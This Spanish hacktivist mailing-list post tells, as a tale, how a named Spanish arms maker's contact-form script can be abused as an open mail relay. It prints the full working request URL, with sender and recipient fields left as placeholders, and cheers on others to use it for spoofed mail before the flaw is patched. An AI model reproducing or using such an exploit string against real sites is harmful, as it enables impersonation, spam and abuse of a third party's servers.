[Hacklabs] [OT] Un cuento de armas

[lord epsylon]

Erase una vez una empresa de fabricación de armas española, cuyo sitio
web permitía a los usuarios comprobar la "hermosa" gama de productos
bélicos que ofrecía, así como sus últimos avances armamentísticos, a
pesar de haber sido denunciados públicamente en muchas ocasiones por su
vinculación con la fabricación de las prohibidas bombas de racimo
(http://www.asturiasverde.com/2007/septiembre/00890bombas-racimo.htm).

Un buen día un hacktivista se puso a mirar el código, y comprobó que no
filtraban bien los parámetros de envío de correos. Permitiéndole a él y
a todxs sus amiguitos, realizar envíos de mails utilizando la dirección
IP de la empresa, pudiendo actuar en su nombre, y poniendo además el
remitente que ellos quisieran, quedando por tanto su identidad en el
anonimato.

La "url mágica" fue la siguiente:

http://www.instalaza.es/_jlgFormMail.php?email=1&teléfono=1&country=1&ciudad=1&cargo=1&empresa=1&nombre=1&apellidos=1&_jlgFormMail_GMT=1&_jlgFormMail_host=1&_jlgFormMail_subject=Formulario&_jlgFormMail_remitente_email=EMISOR@UNMAIL.COM&_jlgFormMail_destinatario_email=DESTINO@UNMAIL.COM

Aquella bonita historia comenzó a extenderse, y muchos fueron los que
empezaron a realizar acciones, y a lanzar ideas sobre su posible uso
antes de que dieran con el fallo.... La historia continua... y a mi me
ha tocado narrarla.

Un saludo ;)

-- 
 "La Libertad del futuro, la define el Hacktivismo presente"
 +------------------------------------------------------------+
 | GPG Key : http://lordepsylon.net/descargas/lordepsylon.asc |
 |------------------------------------------------------------|
*lord epsylon                   http://www.lordepsylon.net       
*Grupo Telemático Hckrs         http://hckrs.probeta.yi.org        
*Radio Hckrs                    http://giss.tv:8000/hckrs.ogg    
*Yoire.com (Hacking & Wargames) http://www.yoire.com
 +------------------------------------------------------------+